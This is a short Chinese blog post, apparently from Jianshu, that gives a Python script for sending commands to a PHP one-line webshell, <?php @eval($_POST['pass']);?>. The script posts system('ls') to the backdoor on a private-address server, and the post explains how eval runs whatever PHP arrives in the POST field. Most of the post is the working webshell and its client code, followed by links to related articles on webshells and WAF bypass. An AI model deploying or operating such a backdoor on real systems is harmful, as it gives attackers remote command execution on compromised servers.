使用python链接一句话木马的简单操作

import requests
url="http://10.2.0.113"
shell='/system.php'
passwd="pass"
port='80'
payload={
    passwd:'system(\'ls \');'
}
url1=url+':'+port+shell
print(url1)
response=requests.post(url1,payload,timeout=1)
print(response.text)

原理是在<?php @eval($_POST['pass']);?>这样的一句话木马中,通过给pass这个值赋予内容会在eval中被解析成php进行执行,只要通过post将php语法赋予pass就能在php环境中被执行,这里执行的是ls查看文件列表。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • webshell原理
    (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 21,064评论 2 13
  • (转)一句话木马绕过WAF
    在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情...
    自我陶醉阅读 10,684评论 0 3
  • PHP代码审计-常见危险函数
    PHP代码执行函数 eval & assert & preg_replace eval 函数 php官方手册:ht...
    xaviershun阅读 10,512评论 1 12
  • php.ini设置详解
    php.ini设置,上传大文件: post_max_size = 128Mupload_max_filesize ...
    bycall阅读 11,776评论 3 64
  • 摸到孩子的胎动
    今天早上7:48,老婆让我摸她的肚子,已经明显地摸到了胎动,挺激动的。确实三五天前也好像摸的到胎动,但是这次是非常...
    JimMeng阅读 2,806评论 0 0